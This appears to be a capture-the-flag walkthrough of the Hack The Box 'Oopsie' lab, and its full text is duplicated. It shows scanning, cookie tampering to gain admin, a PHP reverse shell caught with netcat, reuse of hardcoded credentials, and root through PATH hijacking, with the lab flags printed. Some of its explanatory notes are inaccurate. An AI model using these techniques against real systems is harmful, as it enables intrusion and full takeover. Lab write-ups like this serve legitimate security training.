02.OOPSIE

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.
         
 * use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
    - the -PN option treats all hosts as online and will skip host discovery

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 22,80
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
 |   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
 |_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
 |_http-title: Welcome
 |_http-server-header: Apache/2.4.29 (Ubuntu)

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 22,80
 PORT   STATE SERVICE
 22/tcp open  ssh
 80/tcp open  http
 | http-internal-ip-disclosure: 
 |_  Internal IP Leaked: 127.0.1.1
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 |_http-csrf: Couldn't find any CSRF vulnerabilities.

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit user flag and root flag.

#walk the application
root@htb:~$ BROWSER > {targetSite:port}
 Services
 We provide services to operate manufacturing data such as quotes, 
 customer requests etc. Please login to get access to the service.

 * no visible login page identified

#crawl the webapp and conduct directory and page enumeration - either via fuzzing or crawling
#step 1: configure the browser to intercept traffic
root@oco:~$ BROWSER > Settings
 Search: Proxy
 
root@oco:~$ BROWSER > Network Settings > Settings
 Configure Proxy Access to the Internet
  Manual Proxy Configuration: enabled
  HTTP Proxy: 127.0.0.1
  Port: 8080 {default Burp listening port}
  Also Use this Proxy for HTTPS: enabled
  
 * it is advisable to also check the option of "Also use this proxy for FTP and HTTPS" IOT have all requests go through BurpSuite
 
step 2: #disable Burp Intercept
root@oco:~$ burpsuite &
BURP > Proxy > Intercept
 Intercept is on: disabled

 * Burp's intercept is enabled by default
 
step 3: passively crawl the target site
root@oco:~$ BROWSER > {targetSite:port}

 * can also simply refresh the page if already on the target site
 
step 4: identify pertinent pages in burpsuite
BURP > Target > Site Map > ...
 http://10.129.203.93
  -> /
  -> cdn-cgi
      -> login
          -> script.js
  -> css
  -> js
  -> themes

#identification
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest

 * can also brute force the page
 * identify possible entry points on the webapp
    - Account page
       Access ID	Name	Email
       2233	guest	guest@megacorp.com
    - Uploads page; this requires admin privileges
    
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
 name     value
 role     guest  ...
 user     2233   ...

root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > Account Link
 http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
 
 * guest account ID is shown...admin id can be enumerated by changing the ID value manually or through automated means

#enumeration
root@htb:~$ BROWSER > http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
 Access ID	Name	Email
 34322	admin	admin@megacorp.com

  * enumerate for the admin account by changing the id value to something else until found
     - admin info identified
     
#exploit via changing cookie value
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
 name     value
 role     admin   ...
 user     34322   ...

 * reload the page to escalate privilege to admin

#upload a php reverse shell payload
root@oco:~$ curl -O https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php
root@oco:~$ nano php-reverse-shell.php
 $ip = '{attackerIP}';     // CHANGE THIS
 $port = {listeningPort};   // CHANGE THIS
 
root@oco:~$ nc -nlvp {listeningPort}

root@oco:~$ BROWSER > {targetSite:port} > upload

#find where the uploaded file was stored by the server
root@oco:~$ find / -iname directory-list* -type f 2>/dev/null
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt .

#modify the wordlist and add the reverse shell file name
root@oco:~$ directory-list-2.3-small.txt
 php-reverse-shell
 
 * note: the server might change the filename as it get uploaded as a security measure

root@oco:~$ gobuster dir --url http://{targetIP}/ --wordlist directory-list-2.3-small.txt -x php -r -t 50
 /.php                 (Status: 403) [Size: 277]
 /themes               (Status: 403) [Size: 277]
 /uploads              (Status: 403) [Size: 277]
 /css                  (Status: 403) [Size: 277]
 /index.php            (Status: 200) [Size: 10932]
 /images               (Status: 403) [Size: 277]
 /js                   (Status: 403) [Size: 277]
 /fonts                (Status: 403) [Size: 277]
 
 * the "dir" option refers directory enumeration mode
 * the --url specifies the target IP/URL
 * the --wordlist specifies the wordlist to use
 * the -x appends file extensions to each word in the wordlist
 * can specify multiple extensions by separating them with commas
    - php,html,txt
 * the -r refers to "recursive fuzzing" (if a directory is found, it continues brute-forcing inside it)
 * the -t will use multi threading to make the scan faster (default is 0)
    - this could trigger rate-limiting or bans

root@oco:~$ curl http://{targetSite:port}/uploads/php-reverse-shell.php
root@oco:~$ nc....
 listening on [any] 1234 ...
 connect to [10.10.14.215] from (UNKNOWN) [10.129.6.196] 57704
 Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
  11:14:29 up 41 min,  0 users,  load average: 0.00, 0.02, 0.01
  USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  /bin/sh: 0: can't access tty; job control turned off

www-data@target:~$ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
#upgrade the shell to a fully interactive TTY session for post-exploitation
www-data@target:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'

 *  use the pty module to spawn a new interactive Bash shell.

#privilege escalation...
www-data@target:~$ cat /etc/passwd
 root:x:0:0:root:/root:/bin/bash
 www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 robert:x:1000:1000:robert:/home/robert:/bin/bash

 * this will identify users on the system

www-data@target:~$ ls /home
 robert

www-data@target:~$ ls /home/robert
 user.txt

www-data@target:~$ cat /home/robert/user.txt
 f2c74ee8db7983851ab2a96a44eb7981
 
#find ALL files where the user "robert" is mentioned
www-data@target:~$ find /var/www/html/ -type f -exec grep -iwl "robert" {} + 2>/dev/null
 </ -type f -exec grep -iwl "robert" {} + 2>/dev/null
 /var/www/html/cdn-cgi/login/db.php

 * the + instructs the cmd to find batches multiple files into a single command execution, making it much faster.
    - is used to optimized execution (batches multiple files into one grep call for speed).
 * the -w ensures a strict search for only the exact word "robert"
 
 * -i is used for Case-insensitive search (robert, ROBERT, Robert all match).
 * -l will only lists filenames (faster if you just need to know where "robert" appears).
 * {} is a placeholder for found files.

www-data@target:~$ cat /var/www/html/cdn-cgi/login/db.php
 <?php
 $conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
 ?>

 * hardcoded credentials found 
 
www-data@target:~$ su robert
 Password: M3g4C0rpUs3r!
 
robert@oopsie:/$

robert@oopsie:/$ sudo -l

 * list the commands that a user is allowed to run with sudo privileges on a system.
 
robert@oopsie:/$ id
 uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
 
robert@oopsie:/$ find / -group {groupName} 2>/dev/null
 /usr/bin/bugtracker

 * this will searche for files/executables that belong to the specified group
 
#check for the file privileges and type
robert@oopsie:/$ ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker
 -rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker
 /usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped

 * the "s" in the user execute position (rws) indicates that the file has the 
   setuid permission set. this means that when this binary is executed, it will run 
   with the permissions of the file's owner (in this case, root), not the user who 
   ran it.
    - if a non-root user runs /usr/bin/bugtracker, the program will execute as the 
      root user (because root is the owner of the file), giving the user elevated 
      privileges.
      
robert@oopsie:/$ /usr/bin/bugtracker
 ------------------
 : EV Bug Tracker :
 ------------------

 Provide Bug ID: 10
 10
 ---------------

 cat: /root/reports/10: No such file or directory
 
victim@target:~$ touch /tmp/cat
victim@target:~$ echo "/bin/sh" > /tmp/cat
victim@target:~$ cat /tmp/cat
 /bin/sh
 
victim@target:~$ chmod +x /tmp/cat
victim@target:~$ export PATH=/tmp:$PATH

 * this will add the /tmp directory to the environment path
 
victim@target:~$ bugtracker
 ------------------
 : EV Bug Tracker :
 ------------------

 Provide Bug ID: 10
 10
 ---------------

# whoami
 root
# ls /root
 reports  root.txt
# grep -i .* /root/root.txt
 grep: ..: Is a directory
 /root/root.txt:af13b0bee69f8a877c3faf667f7beacf
 
 * if "cat" won't work, then use grep

Previous01.ARCHETYPE (PRIVESC & MSSQL SERVER)Next03.VACCINE

Last updated 1 month ago

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.
         
 * use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
    - the -PN option treats all hosts as online and will skip host discovery

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 22,80
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
 |   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
 |_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
 |_http-title: Welcome
 |_http-server-header: Apache/2.4.29 (Ubuntu)

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 22,80
 PORT   STATE SERVICE
 22/tcp open  ssh
 80/tcp open  http
 | http-internal-ip-disclosure: 
 |_  Internal IP Leaked: 127.0.1.1
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 |_http-csrf: Couldn't find any CSRF vulnerabilities.

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit user flag and root flag.

#walk the application
root@htb:~$ BROWSER > {targetSite:port}
 Services
 We provide services to operate manufacturing data such as quotes, 
 customer requests etc. Please login to get access to the service.

 * no visible login page identified

#crawl the webapp and conduct directory and page enumeration - either via fuzzing or crawling
#step 1: configure the browser to intercept traffic
root@oco:~$ BROWSER > Settings
 Search: Proxy
 
root@oco:~$ BROWSER > Network Settings > Settings
 Configure Proxy Access to the Internet
  Manual Proxy Configuration: enabled
  HTTP Proxy: 127.0.0.1
  Port: 8080 {default Burp listening port}
  Also Use this Proxy for HTTPS: enabled
  
 * it is advisable to also check the option of "Also use this proxy for FTP and HTTPS" IOT have all requests go through BurpSuite
 
step 2: #disable Burp Intercept
root@oco:~$ burpsuite &
BURP > Proxy > Intercept
 Intercept is on: disabled

 * Burp's intercept is enabled by default
 
step 3: passively crawl the target site
root@oco:~$ BROWSER > {targetSite:port}

 * can also simply refresh the page if already on the target site
 
step 4: identify pertinent pages in burpsuite
BURP > Target > Site Map > ...
 http://10.129.203.93
  -> /
  -> cdn-cgi
      -> login
          -> script.js
  -> css
  -> js
  -> themes

#identification
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest

 * can also brute force the page
 * identify possible entry points on the webapp
    - Account page
       Access ID	Name	Email
       2233	guest	guest@megacorp.com
    - Uploads page; this requires admin privileges
    
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
 name     value
 role     guest  ...
 user     2233   ...

root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > Account Link
 http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
 
 * guest account ID is shown...admin id can be enumerated by changing the ID value manually or through automated means

#enumeration
root@htb:~$ BROWSER > http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
 Access ID	Name	Email
 34322	admin	admin@megacorp.com

  * enumerate for the admin account by changing the id value to something else until found
     - admin info identified
     
#exploit via changing cookie value
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
 name     value
 role     admin   ...
 user     34322   ...

 * reload the page to escalate privilege to admin

#upload a php reverse shell payload
root@oco:~$ curl -O https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php
root@oco:~$ nano php-reverse-shell.php
 $ip = '{attackerIP}';     // CHANGE THIS
 $port = {listeningPort};   // CHANGE THIS
 
root@oco:~$ nc -nlvp {listeningPort}

root@oco:~$ BROWSER > {targetSite:port} > upload

#find where the uploaded file was stored by the server
root@oco:~$ find / -iname directory-list* -type f 2>/dev/null
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt .

#modify the wordlist and add the reverse shell file name
root@oco:~$ directory-list-2.3-small.txt
 php-reverse-shell
 
 * note: the server might change the filename as it get uploaded as a security measure

root@oco:~$ gobuster dir --url http://{targetIP}/ --wordlist directory-list-2.3-small.txt -x php -r -t 50
 /.php                 (Status: 403) [Size: 277]
 /themes               (Status: 403) [Size: 277]
 /uploads              (Status: 403) [Size: 277]
 /css                  (Status: 403) [Size: 277]
 /index.php            (Status: 200) [Size: 10932]
 /images               (Status: 403) [Size: 277]
 /js                   (Status: 403) [Size: 277]
 /fonts                (Status: 403) [Size: 277]
 
 * the "dir" option refers directory enumeration mode
 * the --url specifies the target IP/URL
 * the --wordlist specifies the wordlist to use
 * the -x appends file extensions to each word in the wordlist
 * can specify multiple extensions by separating them with commas
    - php,html,txt
 * the -r refers to "recursive fuzzing" (if a directory is found, it continues brute-forcing inside it)
 * the -t will use multi threading to make the scan faster (default is 0)
    - this could trigger rate-limiting or bans

root@oco:~$ curl http://{targetSite:port}/uploads/php-reverse-shell.php
root@oco:~$ nc....
 listening on [any] 1234 ...
 connect to [10.10.14.215] from (UNKNOWN) [10.129.6.196] 57704
 Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
  11:14:29 up 41 min,  0 users,  load average: 0.00, 0.02, 0.01
  USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  /bin/sh: 0: can't access tty; job control turned off

www-data@target:~$ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
#upgrade the shell to a fully interactive TTY session for post-exploitation
www-data@target:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'

 *  use the pty module to spawn a new interactive Bash shell.

#privilege escalation...
www-data@target:~$ cat /etc/passwd
 root:x:0:0:root:/root:/bin/bash
 www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 robert:x:1000:1000:robert:/home/robert:/bin/bash

 * this will identify users on the system

www-data@target:~$ ls /home
 robert

www-data@target:~$ ls /home/robert
 user.txt

www-data@target:~$ cat /home/robert/user.txt
 f2c74ee8db7983851ab2a96a44eb7981
 
#find ALL files where the user "robert" is mentioned
www-data@target:~$ find /var/www/html/ -type f -exec grep -iwl "robert" {} + 2>/dev/null
 </ -type f -exec grep -iwl "robert" {} + 2>/dev/null
 /var/www/html/cdn-cgi/login/db.php

 * the + instructs the cmd to find batches multiple files into a single command execution, making it much faster.
    - is used to optimized execution (batches multiple files into one grep call for speed).
 * the -w ensures a strict search for only the exact word "robert"
 
 * -i is used for Case-insensitive search (robert, ROBERT, Robert all match).
 * -l will only lists filenames (faster if you just need to know where "robert" appears).
 * {} is a placeholder for found files.

www-data@target:~$ cat /var/www/html/cdn-cgi/login/db.php
 <?php
 $conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
 ?>

 * hardcoded credentials found 
 
www-data@target:~$ su robert
 Password: M3g4C0rpUs3r!
 
robert@oopsie:/$

robert@oopsie:/$ sudo -l

 * list the commands that a user is allowed to run with sudo privileges on a system.
 
robert@oopsie:/$ id
 uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
 
robert@oopsie:/$ find / -group {groupName} 2>/dev/null
 /usr/bin/bugtracker

 * this will searche for files/executables that belong to the specified group
 
#check for the file privileges and type
robert@oopsie:/$ ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker
 -rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker
 /usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped

 * the "s" in the user execute position (rws) indicates that the file has the 
   setuid permission set. this means that when this binary is executed, it will run 
   with the permissions of the file's owner (in this case, root), not the user who 
   ran it.
    - if a non-root user runs /usr/bin/bugtracker, the program will execute as the 
      root user (because root is the owner of the file), giving the user elevated 
      privileges.
      
robert@oopsie:/$ /usr/bin/bugtracker
 ------------------
 : EV Bug Tracker :
 ------------------

 Provide Bug ID: 10
 10
 ---------------

 cat: /root/reports/10: No such file or directory
 
victim@target:~$ touch /tmp/cat
victim@target:~$ echo "/bin/sh" > /tmp/cat
victim@target:~$ cat /tmp/cat
 /bin/sh
 
victim@target:~$ chmod +x /tmp/cat
victim@target:~$ export PATH=/tmp:$PATH

 * this will add the /tmp directory to the environment path
 
victim@target:~$ bugtracker
 ------------------
 : EV Bug Tracker :
 ------------------

 Provide Bug ID: 10
 10
 ---------------

# whoami
 root
# ls /root
 reports  root.txt
# grep -i .* /root/root.txt
 grep: ..: Is a directory
 /root/root.txt:af13b0bee69f8a877c3faf667f7beacf
 
 * if "cat" won't work, then use grep